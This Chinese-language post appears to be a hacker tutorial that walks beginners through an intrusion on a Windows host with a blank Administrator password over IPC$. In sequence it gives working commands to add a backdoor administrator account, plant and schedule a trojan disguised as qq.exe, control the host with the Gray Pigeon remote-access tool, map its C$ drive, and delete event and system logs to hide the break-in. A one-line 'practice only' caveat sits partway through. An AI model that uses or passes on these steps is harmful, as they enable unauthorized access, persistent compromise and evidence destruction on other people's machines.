通过IPC弱口令的入侵(原创)--莱鸟必看呀,现场版
工具:流光4.7
灰鸽子
过程:
首先我用流光进行扫描一个IP,发现这个IP有IPC弱口令,Administrator的密码为空,可以进行IPC连接,接着在CMD中输入空连接命令net user \\62.130..\ipc$ "" /user:"Administrator"屏幕会提示"命令成功完成".
现在我们就已经进入了这台主机,下面就需要在这台主机上建立一个属于自己的帐号,输入命令如下
net user skyblue iloveyou /add
(这句命令的意义为在远程主机中加入一个名叫skyblue密码为iloveyou的用户.
当屏幕提示命令成功完成后再输入
net localgroup Administrators skyblue /add
这句命令的意义就是为了把skyblue这个用户加入Administrator组,接着输入net start telnet过一会当屏幕提示命令成功完成时,至此我们已经成功的入侵了一台主机,并且设立了属于自己的帐号,但此时并没有完.
下面我们就讲讲如何给主机种下一个木马,让我们能更好的控制这台肉鸡.
输入net time \\62.130..
这时屏幕上会显示一个时间,这就是主机的时间,假设此时主机的时间为5:10那么我们就再输入
copy qq.exe \\62.130..\admin$\qq.exe
此步命令就是把本机上的qq.exe(木马)传到主机的admin$文件夹,并命名为qq.exe这时,我们已经成功的将木马传到了主机上,下一步就是如何启动木马.
在上面我们已经看到主机的时间为5:10输入at \\62.130.. 5:13 qq.exe如果屏幕此时出现已经成功加入一个作业ID那就算完成了木马的启动了,此命令的具体含义为将qq.exe设为主机的5:13分启动这时候我们就需要另一个软件了,灰鸽子打开灰鸽子,点击"增加主机",输入刚才的IP地址,输入配置服务端的连接密码,点接"确定",便会发现主机已经增加完毕,过一分钟左右,估计主机已经到了5:13后,便进行主机连接,此时便会发现我们已经顺利的进入了目标主机,他的全部文件都会显示在我们在面前.
不过警告呀,不可以随便破坏别人的东西,仅做练习之用,如果主机已经开了139端口,那我们便可以进入映射磁盘了,在灰鸽子的远程命令中将对方的磁盘全部设为共享,接着在CMD中输入如下命令
net use z:\\62.130..\c$
此命令的意义为把对方的C盘映射为本地的Z盘这时候打开我的电脑便看到了这个映身在远程的网络磁盘,更方便了我们控制远程机器了.不过到此我们交没有完成,我们要很隐蔽的隐藏自己,首先在CMD中输入
net use \\62.130..\ipc$ /delte
这是退出语句,接着在灰鸽子中找到如下文件全部删除你的入侵日志:
del C:\winnt\system32\logfiles\.
del C:\winnt\ssytem32\config\.evt
del C:\winnt\system32\dtclog\.*
del C:\winnt\system32\.log
del C:\winnt\system32\.txt
del C:\winnt\.txt
del C:\winnt\.log
至此我们可以说已经完整的控制了一台主机,想干什么就干什么吧,呵呵,我也是一个莱鸟,没什么大的经验,就先写到这吧,欢迎各位与我交流呀,SkyBlueQQ:769964
通过IPC弱口令的入侵
comments powered by Disqus